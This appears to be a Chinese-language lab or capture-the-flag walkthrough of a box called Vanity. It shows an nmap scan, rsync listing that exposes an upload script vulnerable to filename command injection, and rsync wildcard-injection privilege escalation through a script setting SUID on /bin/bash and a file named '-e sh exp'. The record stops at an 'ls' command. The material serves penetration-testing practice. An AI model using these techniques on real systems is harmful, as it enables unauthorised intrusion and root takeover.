Vanity Intermediate 統配符提權

nmap掃描

┌──(root㉿kali)-[~]
└─# nmap -p- -A 192.168.167.234
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-09 03:59 UTC
Stats: 0:01:22 elapsed; 0 hosts completed (1 up), 1 undergoing Traceroute
Traceroute Timing: About 32.26% done; ETC: 04:00 (0:00:00 remaining)
Nmap scan report for 192.168.167.234
Host is up (0.072s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)
|   256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
|_  256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
80/tcp  open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Vanity Virus Scanner
|_http-server-header: Apache/2.4.41 (Ubuntu)
873/tcp open  rsync   (protocol version 31)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=11/9%OT=22%CT=1%CU=43814%PV=Y%DS=4%DC=T%G=Y%TM=672E
OS:DE5A%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=107%TI=Z%II=I%TS=A)OPS(O
OS:1=M551ST11NW7%O2=M551ST11NW7%O3=M551NNT11NW7%O4=M551ST11NW7%O5=M551ST11N
OS:W7%O6=M551ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R
OS:=Y%DF=Y%T=40%W=FAF0%O=M551NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%
OS:RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%
OS:Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK
OS:=9655%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 199/tcp)
HOP RTT      ADDRESS
1   69.74 ms 192.168.45.1
2   69.54 ms 192.168.45.254
3   71.50 ms 192.168.251.1
4   71.55 ms 192.168.167.234

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 84.89 seconds

rsync檢視原始碼

┌──(root㉿kali)-[~/lab]
└─# rsync  -rdt rsync://192.168.167.234
source          Web Source
backup          Virus Samples Backup
                                                                                                                                                    
┌──(root㉿kali)-[~/lab]
└─# rsync  -rdt rsync://192.168.167.234/source
drwxr-xr-x          4,096 2022/10/25 11:31:36 .
-rw-r--r--          2,814 2022/10/25 11:31:36 index.html
-rw-r--r--            155 2022/10/25 11:31:36 style.css
drwxr-xr-x          4,096 2022/10/25 11:31:36 uploads
-rw-r--r--            738 2022/10/25 11:31:36 uploads/upload.php
                                                                                                                                                    
┌──(root㉿kali)-[~/lab]
└─# rsync  -rdt rsync://192.168.167.234 ./rsyn_shared
source          Web Source
backup          Virus Samples Backup
                                                                                                                                                    
┌──(root㉿kali)-[~/lab]
└─# ls
apache_2fa  pass
                                                                                                                                                    
┌──(root㉿kali)-[~/lab]
└─# rsync  -rdt rsync://192.168.167.234/source       
drwxr-xr-x          4,096 2022/10/25 11:31:36 .
-rw-r--r--          2,814 2022/10/25 11:31:36 index.html
-rw-r--r--            155 2022/10/25 11:31:36 style.css
drwxr-xr-x          4,096 2022/10/25 11:31:36 uploads
-rw-r--r--            738 2022/10/25 11:31:36 uploads/upload.php
                                                                                                                                                    
┌──(root㉿kali)-[~/lab]
└─# rsync  -rdt rsync://192.168.167.234/source/uploads/upload.php
-rw-r--r--            738 2022/10/25 11:31:36 upload.php
                                                                                                                                                    
┌──(root㉿kali)-[~/lab]
└─#  rsync  -av rsync://192.168.167.234/source/uploads/upload.php ./upload.php
receiving incremental file list
upload.php

sent 43 bytes  received 834 bytes  250.57 bytes/sec
total size is 738  speedup is 0.84
                                                                                                                                                    
┌──(root㉿kali)-[~/lab]
└─# ls
apache_2fa  pass  upload.php
                                                                                                                                                    
┌──(root㉿kali)-[~/lab]
└─# cat upload.php     
<?php

        //Check if the file is well uploaded
        if($_FILES['file']['error'] > 0) { echo 'Error during uploading, try again'; }


        //Set up valid extension
        $extsNotAllowed = array( 'php','php7','php6','phar','phtml','phps','pht','phtm','pgif','shtml','htaccess','inc');

        $extUpload = strtolower( substr( strrchr($_FILES['file']['name'], '.') ,1) ) ;

        //Check if the uploaded file extension is allowed

        if (in_array($extUpload, $extsNotAllowed) ) { 
        echo 'File not allowed'; 

        } 
    else {
        $name = "{$_FILES['file']['name']}";
        $result = move_uploaded_file($_FILES['file']['tmp_name'], $name);
        if($result){
            system("/usr/bin/clamscan $name");
        }
    }

?>                                                                                                                                                    

發現命令執行漏洞getshell

pspy32發現會執行rsync命令定時任務，存在萬用字元提權

利用萬用字元提權

www-data@vanity:/var/www/html/uploads$ rm *
www-data@vanity:/var/www/html/uploads$ echo "chmod +s /bin/bash" > exp
www-data@vanity:/var/www/html/uploads$ chmod 777 *
www-data@vanity:/var/www/html/uploads$ echo > '-e sh exp'
www-data@vanity:/var/www/html/uploads$ ls